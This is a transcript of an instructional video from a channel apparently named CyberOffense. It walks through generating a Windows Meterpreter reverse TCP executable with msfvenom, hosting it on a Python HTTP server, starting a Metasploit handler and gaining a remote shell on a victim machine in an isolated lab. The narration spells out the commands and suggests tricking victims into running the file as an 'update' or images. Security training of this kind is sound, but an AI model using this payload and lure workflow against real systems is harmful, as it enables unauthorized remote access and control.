Use Msfvenom to Create a Reverse TCP Payload

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
greetings i'm professor k and in this short video presentation we're going to take a look at how we can use msf venom to create a reverse tcp payload a reverse shell also known as a connect back is the opposite of a bind shell it requires the attacker to set up a listener first on the attack machine the target machine then acts as a client connecting to the listener and finally the attacker receives the shell in this lab demonstration i'll be using one virtual install of kali linux one virtual install of meta sportable3 and my virtualbox adapters are set to host only network once you have confirmed that your virtualbox network adapters are set to host only adapters you can then do a ip discovery starting with your cali machine to see the ip address that is currently assigned to your cali machine just open up a terminal and at the prompt you're going to type in ifconfig once you have that typed in correctly go ahead and hit enter and the ip address you're going to be looking for is the one that is assigned to your ethernet 0 adapter currently the ip address i have assigned to my ethernet 0 adapter is 192.168.56.101 this is my ip address yours may differ once you've discovered the ip address for your cali machine move on over to your target machine go to start and from the start menu select command prompt at the prompt you're going to type in ipconfig hit enter and the ip address that you want from this output is for the local area connection my ip address is 192.168.56.103 this is my ip address for my target your target ip may differ to ensure that you have good connectivity between your cali machine and the target from your cali machine bring up a terminal type in ping and follow that up with the ip address of your target once you have everything typed in correctly go ahead and hit enter to break out of the ping sequence just go ahead and type in control c we are now ready to continue on with the lab from your cali desktop right click anywhere and from the context menu you're going to select create folder you're going to give this folder a user friendly name i've called mine shell codes all one word you are free to name your folder as you please once you have it named correctly go ahead and click on the create button once you have that working folder created on your cali desktop you're going to right click on it and from the context menu you're going to select open terminal here we're now ready to create our payload using msf venom so at my cali prompt i've typed in msf venom give it a space a dash p which stands for the payload this payload is windows forward slash meta printer forward slash reverse underscore tcp give it a space i now have to type in the local host ip address which is the ip address for my calling machine so at the prompt i've typed in lhost equals 192.168.56.101 give it a space i now have to type in the listing port that cali will be using to receive the connection so at the prompt i've typed in lport equals 5555 give it a space i'm going to be creating a file type of exe so at the prompt i've typed in dash small letter f which stands for file type give it a space exe give it a space use the greater than sign which says output the file to a certain location in this case i've typed in forward slash root forward slash desktop forward slash the name of my working folder which is shellcodes forward slash reverse underscore tcp.exe which is the name of the file that i'm going to create inside of my working folder once you have everything typed in correctly go ahead and hit enter you gotta wait a few seconds for msf venom to create the payload so do be patient payload has been created and it has been placed inside of my working folder we can go ahead and close out this terminal and open up our working folder and inside my working folder i have the payload reverse underscore tcp.exe go ahead and close out your working folder we next have to convince our victim that they need to come to a website and that they need to download this payload because it's important we can tell them that it's an update that is a bunch of images that they're going to enjoy whatever it is we need to do to get the victim to download this executable we have to do so to do this and make it as easy as possible on myself i'm going to right click on my working folder and from the context menu again i'm going to open terminal here the easiest way for someone to transfer files from a cali machine up to a target is using a python 3 simple http server so at the prompt i've typed in python 3 space small letter m space http dot server once i have all that typed in correctly i'm just going to hit enter and now i have a web server running inside of my working folder where i have that payload this http web server is running on port 8000 that is the default port we don't have to configure a port number unless we want it to run on a different port for the web server to continue running you must leave this prompt open you can minimize it but do not close it we next need to use metasploit to create a reverse tcp listener to do this let's open up a new terminal at the terminal we're going to type in msf console once you have that typed in correctly go ahead and hit enter the first thing we have to type in is the exploit that we need to use so at the prompt i've typed in use space exploit forward slash multi forward slash handler go ahead and hit enter we next need to assign the correct payload to the exploit so at the prompt i've typed in set space payload space windows forward slash meta predator forward slash reverse underscore tcp go ahead hit enter i next have to set the local host ip address which is the ip address from my calling machine so at the prompt i've typed in set space lhost space the ip address of my cali machine which is 192.168.56.101. this is the ip address for my cali machine your ip address may differ go ahead hit enter we next need to set the listing port for my calling machine so at the prompt i've typed in set space l port space 5555 hit enter and we're now ready to configure the listener for a reverse tcp connection to do this i'm going to type in exploit hit enter and i now have a reverse tcp handler waiting for a connection on my calling machine listing on port 5555 let's bring up our target machine so as i mentioned earlier we have to figure out a way to get the exploit over to the victim's machine it's pretty hard to do this unless we have actual access to the machine or we can convince the victim to assist us in this case i'm going to get the victim to go to an ip address for my web server that i have running inside of my working folder so to do this i'm going to go to start and i'm going to open up internet explorer on this first screen that pops up just click the button that says ask me later and now in the address bar you're going to type in the following http colon forward slash forward slash the ip address of your cali machine 192.168.56.101 and we have a web server that is running on port 8000. go ahead and select that and once you do that it's going to find whatever is present inside of that working folder and in this case it found our payload which is the reverse underscore tcp dot exe now all i have to do is get the user to double click it click run and click run one more time now if we go on back over to my cali machine you'll see that we have a meta predator session now that we have established a reverse shell between our cali machine and our target machine we can now continue to attack and exploit the machine further to get a command prompt on my target machine using my meta predator session all i have to do is type in shell hit enter and i now have a command prompt as if i was sitting at my target machine and so in this short video presentation you got to see how we can use msf venom to create a reverse tcp payload i'm professor k thanks for watching and i'll see you in my next video
Info
Channel: CyberOffense
Views: 34,224
Rating: undefined out of 5
Keywords:
Id: ZqWfDrD2WVY
Channel Id: undefined
Length: 9min 30sec (570 seconds)
Published: Sun Apr 17 2022
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.